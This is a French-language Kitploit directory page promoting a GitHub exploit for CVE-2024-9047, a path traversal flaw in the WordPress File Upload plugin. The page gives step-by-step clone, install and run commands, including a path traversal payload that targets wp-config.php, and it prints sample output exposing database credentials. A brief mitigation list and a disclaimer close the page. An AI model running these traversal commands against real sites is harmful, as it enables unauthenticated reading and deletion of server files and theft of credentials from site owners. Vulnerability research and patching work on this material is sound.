Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-9047-Exploit — Exploit pour le plugin WordPress File Upload - Toutes les versions jusqu'à 4.24.11 sont vulnérables. | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-9047-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubnxploited/cve-2024-9047-exploit

CVE-2024-9047-Exploit

Exploit pour le plugin WordPress File Upload - Toutes les versions jusqu'à 4.24.11 sont vulnérables.

Voir le dépôt
41il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-9047 : Exploit pour le plugin de téléversement de fichiers WordPress

Description

Le plugin WordPress File Upload pour WordPress est vulnérable à une faille de Path Traversal dans toutes les versions jusqu'à (et y compris) la version 4.24.11 via le fichier wfu_file_downloader.php. Cette vulnérabilité permet à des attaquants non authentifiés de lire ou de supprimer des fichiers en dehors du répertoire prévu. Une exploitation réussie nécessite que l'installation WordPress ciblée fonctionne sous PHP 7.4 ou antérieur.

Impact

  • Gravité : Critique
  • Score CVSS : 9.8 (Critique)
  • Vecteur d'attaque : Réseau
  • Authentification requise : Non

Exploitation

Un attaquant peut exploiter cette vulnérabilité en forgeant une requête spécifique vers le point d'accès vulnérable wfu_file_downloader.php et en manipulant le paramètre de chemin de fichier pour obtenir un accès non autorisé à des fichiers sensibles sur le serveur.


Détails de l'exploit

Prérequis

  • L'installation WordPress ciblée doit avoir le plugin vulnérable installé (version 4.24.11 ou antérieure).
  • Le serveur doit exécuter une version de PHP 7.4 ou antérieure.

Étapes pour exploiter

  1. Clonez ce dépôt :

    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-9047-Exploit.git
    cd CVE-2024-9047-Exploit
    
  2. Installez les dépendances Python (si nécessaire) :

    root@kitploit:~
    pip install requests
    
  3. Exécutez le script pour vérifier la version du plugin et exploiter la vulnérabilité :

    root@kitploit:~
    python3 CVE-2024-9047.py --url http://target-site.com --command /../../../../../path/to/target/file
    

Exemple d'utilisation

Pour exploiter la configuration vulnérable par défaut et lire le fichier de configuration de WordPress :

root@kitploit:~
python3 CVE-2024-9047.py --url http://192.168.1.100 --command /../../../../../opt/lampp/htdocs/wordpress/wp-config.php

Résultat

root@kitploit:~
C:\Users\Nxploit\Desktop\-C>python CVE-2024-9047.py -u http://192.168.100.74:888/wordpress/
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
<?php

// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );

/** Database username */
define( 'DB_USER', 'root' );

/** Database password */
define( 'DB_PASSWORD', '' );

/** Database hostname */
define( 'DB_HOST', 'localhost' );

/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

/**#@+


Atténuation

Pour protéger votre site WordPress :

  1. Mettez à jour le plugin WordPress File Upload vers la dernière version.
  2. Assurez-vous que la version de PHP est mise à jour vers une version prise en charge (supérieure à 7.4).
  3. Restreignez les permissions des fichiers pour empêcher tout accès non autorisé aux fichiers sensibles.
  4. Utilisez un pare-feu applicatif web (WAF) pour bloquer les requêtes malveillantes.

Avertissement

Ce code est destiné uniquement à des fins éducatives et de recherche. L'utilisation non autorisée de ce script sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite de test est illégale et contraire à l'éthique. Les auteurs déclinent toute responsabilité en cas d'utilisation abusive de ce code.

Télécharger l’outil